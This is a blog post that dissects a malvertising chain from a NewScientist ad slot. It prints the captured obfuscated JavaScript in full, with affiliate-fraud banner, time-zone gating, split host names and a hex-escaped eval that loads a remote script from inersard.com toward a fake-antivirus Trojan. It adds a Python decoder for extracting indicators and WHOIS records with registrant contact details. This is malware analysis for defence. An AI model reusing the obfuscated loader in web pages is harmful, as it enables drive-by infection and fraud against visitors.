Anatomy of a Fraud
Now that I have a blog, I can document some of the malware that I come across. The impetus behind this post is a retweeted link to a NewScientist story entitled "Genome firm shoots itself in the foot."
The problem starts with the fact that the NewScientist uses ADTECH to serve banner ads via some JavaScript magic. The way the JavaScript magic works is as follows:
- A NewScientist web page requests JavaScript from an ADTECH server.
- The ADTECH server responds with a JavaScript that contains a request for another JavaScript from a 3rd party server.
- Periodically, "farmingtoncp.com" is the 3rd party server from which the ultimate JavaScript is requested.
The problem with "farmingtoncp.com" is that it occasionally delivers the following JavaScript:
// First stage: the JetBlue affiliate banner (URL and markup are percent-encoded)
document.write(unescape("%3Ca href='http%3A%2F%2Fjetblue.com%2F%3F%3D3468' target='_blank'%3E%3Cimg src='http://farmingtoncp.com/bdb/Jetblue/728x90_upd.jpg' border='0' %3E%3C/a%3E"));

// Local midnight on 1 January minus the same instant parsed from its GMT string, in hours:
// this approximates the visitor's time-zone offset from GMT
statictml = (new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0) - new Date(new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0).toGMTString().substring(0, new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0).toGMTString().lastIndexOf(" ")-1))) / (1000 * 60 * 60);

// Second-stage host assembled from fragments so that "inersard.com" never appears as one string
var cd1 = "ine"; var cd2 = "rsard.co"; var cd3 = "m";
var cur_domain = cd1 + cd2 + cd3;

// Crude time-zone gate: a substring match of the computed offset against this list
var all_t = "-10,-9,-8,-7,-6,-5,-4,-3,-1,0,1";
var mtch = all_t.match(statictml);

if ( mtch == null ) {
  // Visitors outside the targeted offsets only get a hidden tracking iframe
  document.write(unescape("%3Ciframe src='http://"+cur_domain+"/stats_t.php?id=191959845&s=1&e=0' style='visibility:hidden;' width='0' height='0' %3E%3C/iframe%3E"));
} else {
  // Redirect target, again split into fragments
  var abc = "http://nokian-d"; var def = "iscounts.cn/go.php?i"; var klm = "d=2006-51&key=0522c7066&d=1";
  var action_URL = abc + def + klm;
  // Hex-escaped eval; the payload decodes to:
  //   document.write(unescape("%3Cscript src='http://" + cur_domain + "/includes02.js' type='text/javascript'%3E%3C/script%3E"));
  eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%22%25%33%43%73%63%72%69%70%74%20%73%72%63%3D%27%68%74%74%70%3A%2F%2F%22%20%2B%20%63%75%72%5F%64%6F%6D%61%69%6E%20%2B%20%22%2F%69%6E%63%6C%75%64%65%73%30%32%2E%6A%73%27%20%74%79%70%65%3D%27%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%27%25%33%45%25%33%43%2F%73%63%72%69%70%74%25%33%45%22%29%29%3B'));
} //!mtch
This JavaScript may look complex, but it is really quite simple. Its mission is two-fold. First, it sets up a banner ad for JetBlue Airways. If one clicks on the ad, the fraudsters earn a commission via JetBlue's affiliate program run by Commission Junction. The offending JetBlue URL containing the affiliate code is as follows:
http://jetblue.com/?=3468
Secondly, the JavaScript contacts a server at "inersard.com" in order to trigger a redirect to an action_URL, which, in this case, points to a server at the "nokian-discounts.cn" domain name.
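To pull the hidden hosts out of a sample like this without executing it, here is a small static decoder, added as an example and not part of the original post: it folds the split string variables (cd1 + cd2 + cd3, abc + def + klm), decodes every unescape() literal and recurses into the eval'd layer, then lists each URL and domain it finds. The only input is the script quoted above, embedded as a constructed sample; the regular expressions are deliberately simple and tuned to that sample's idioms.

```python
import re
from urllib.parse import unquote

# Constructed sample: the farmingtoncp.com ad script quoted above, minus the time-zone
# arithmetic that carries no indicators. Split across literals only for readability.
SAMPLE_JS = (
    "document.write(unescape(\"%3Ca href='http%3A%2F%2Fjetblue.com%2F%3F%3D3468' target='_blank'%3E"
    "%3Cimg src='http://farmingtoncp.com/bdb/Jetblue/728x90_upd.jpg' border='0' %3E%3C/a%3E\"));\n"
    'var cd1 = "ine"; var cd2 = "rsard.co"; var cd3 = "m"; var cur_domain = cd1 + cd2 + cd3;\n'
    'var all_t = "-10,-9,-8,-7,-6,-5,-4,-3,-1,0,1"; var mtch = all_t.match(statictml);\n'
    "if ( mtch == null ) { document.write(unescape(\"%3Ciframe src='http://\"+cur_domain+\"/stats_t.php"
    "?id=191959845&s=1&e=0' style='visibility:hidden;' width='0' height='0' %3E%3C/iframe%3E\")); } else {\n"
    'var abc = "http://nokian-d"; var def = "iscounts.cn/go.php?i"; var klm = "d=2006-51&key=0522c7066&d=1";\n'
    "var action_URL = abc + def + klm; eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%22%25%33%43%73%63%72%69%70%74%20%73%72%63%3D%27%68%74%74%70%3A%2F%2F%22%20%2B%20%63%75%72%5F%64%6F%6D%61%69%6E%20%2B%20%22%2F%69%6E%63%6C%75%64%65%73%30%32%2E%6A%73%27%20%74%79%70%65%3D%27%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%27%25%33%45%25%33%43%2F%73%63%72%69%70%74%25%33%45%22%29%29%3B')); }"
)

STR_VAR = re.compile(r'var\s+(\w+)\s*=\s*"([^"]*)"\s*;')               # var x = "literal";
CONCAT_VAR = re.compile(r'var\s+(\w+)\s*=\s*((?:\w+\s*\+\s*)+\w+)\s*;')  # var x = a + b + c;
UNESCAPE_CALL = re.compile(r"unescape\(\s*(['\"])(.*?)\1\s*\)", re.DOTALL)
SPLICE = re.compile(r'"\s*\+\s*(\w+)\s*\+\s*"')                         # "..." + name + "..."
URL = re.compile(r"https?://[\w.\-]+[^\s'\"<>]*")

def resolve_vars(js):
    """Collect string literals, then fold concatenations of them; return (all, folded)."""
    env, folded = dict(STR_VAR.findall(js)), {}
    for name, expr in CONCAT_VAR.findall(js):
        parts = [p.strip() for p in expr.split("+")]
        if all(p in env for p in parts):
            folded[name] = env[name] = "".join(env[p] for p in parts)
    return env, folded

def decode_layers(text, env, depth=0):
    """Decode each unescape() literal, splicing in known variables, then recurse into the
    result because an eval()'d layer can hide a further unescape() call."""
    out = []
    for _quote, body in UNESCAPE_CALL.findall(text):
        decoded = SPLICE.sub(lambda m: env.get(m.group(1), m.group(0)), unquote(body))
        out.append(decoded)
        if depth < 5:
            out += decode_layers(decoded, env, depth + 1)
    return out

def extract_iocs(js):
    """URLs and domains hidden in the script, gathered from every decoded layer and folded var."""
    env, folded = resolve_vars(js)
    urls = set()
    for text in decode_layers(js, env) + list(folded.values()):
        urls.update(URL.findall(text))
    return {"urls": sorted(urls), "domains": sorted({u.split("/")[2] for u in urls})}
```

On the sample this yields the four hosts named in the post (jetblue.com, farmingtoncp.com, inersard.com, nokian-discounts.cn), including the includes02.js loader that only becomes visible after the eval layer is decoded.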
From a user's perspective, all of the above happens in an instant so that the page at the NewScientist is bypassed and, in its place, one gets a scary page that declares that "your PC needs to install antimalware software! Antivir can perform fast and free scan of your computer." Unfortunately, if one downloads this antimalware software, one gets a 184,320 byte .exe file (MD5: 800dae61b734f31c9dab82cbd4135594) from "n6-scanner.com" that is really a Trojan horse known as Trojan.Agent.180224.
As you can see, these kinds of scams involve several entities, including many legitimate businesses. Such complexity makes halting Internet-based fraud almost impossible. Still, I hope that this is the last time that I have to deal with malware being delivered over an ad network.
Addendum
The (presumably fake) WHOIS information for each of the sites listed above:
farmingtoncp.com
  Registrant: Kelly Lattimore, dns@farmingtoncp.com
  Phone: 618-329-3335, fax: 618-329-3335
  Address: 273 Eagle Street, Oakdale IL 62268, us
  DNS: ns1.everydns.net, ns2.everydns.net
  Created: 2009-12-02, Expires: 2010-12-02

inersard.com
  Registrant: Steve Garcia, admin@inersard.com
  Phone: 218-597-0073, fax: 218-597-0073
  Address: 1427 Terra Cotta St, Strandquist MN 56758, us
  DNS: ns1.everydns.net, ns2.everydns.net
  Created: 2009-12-21, Expires: 2010-12-21

nokian-discounts.cn
  ROID: 20091213s10001s02831682-cn
  Domain Status: clientTransferProhibited
  Administrative Email: jeya32jay@live.co.uk
  Name Servers: ns1.everydns.net, ns2.everydns.net, ns3.everydns.net, ns4.everydns.net
  Registration Date: 2009-12-13 21:36, Expiration Date: 2010-12-13 21:36

n6-scanner.com
  Registrant: Henry Nguyen Gong, contact@privacy-protect.cn
  Phone: +33.0466583875, fax: +33.0466583875
  Address: Rue la produit 34, Nimes, Languedoc-Roussillon 30189, fr
  DNS: ns1.everydns.net, ns2.everydns.net, ns3.everydns.net, ns4.everydns.net
  Created: 2009-12-20, Expires: 2010-12-20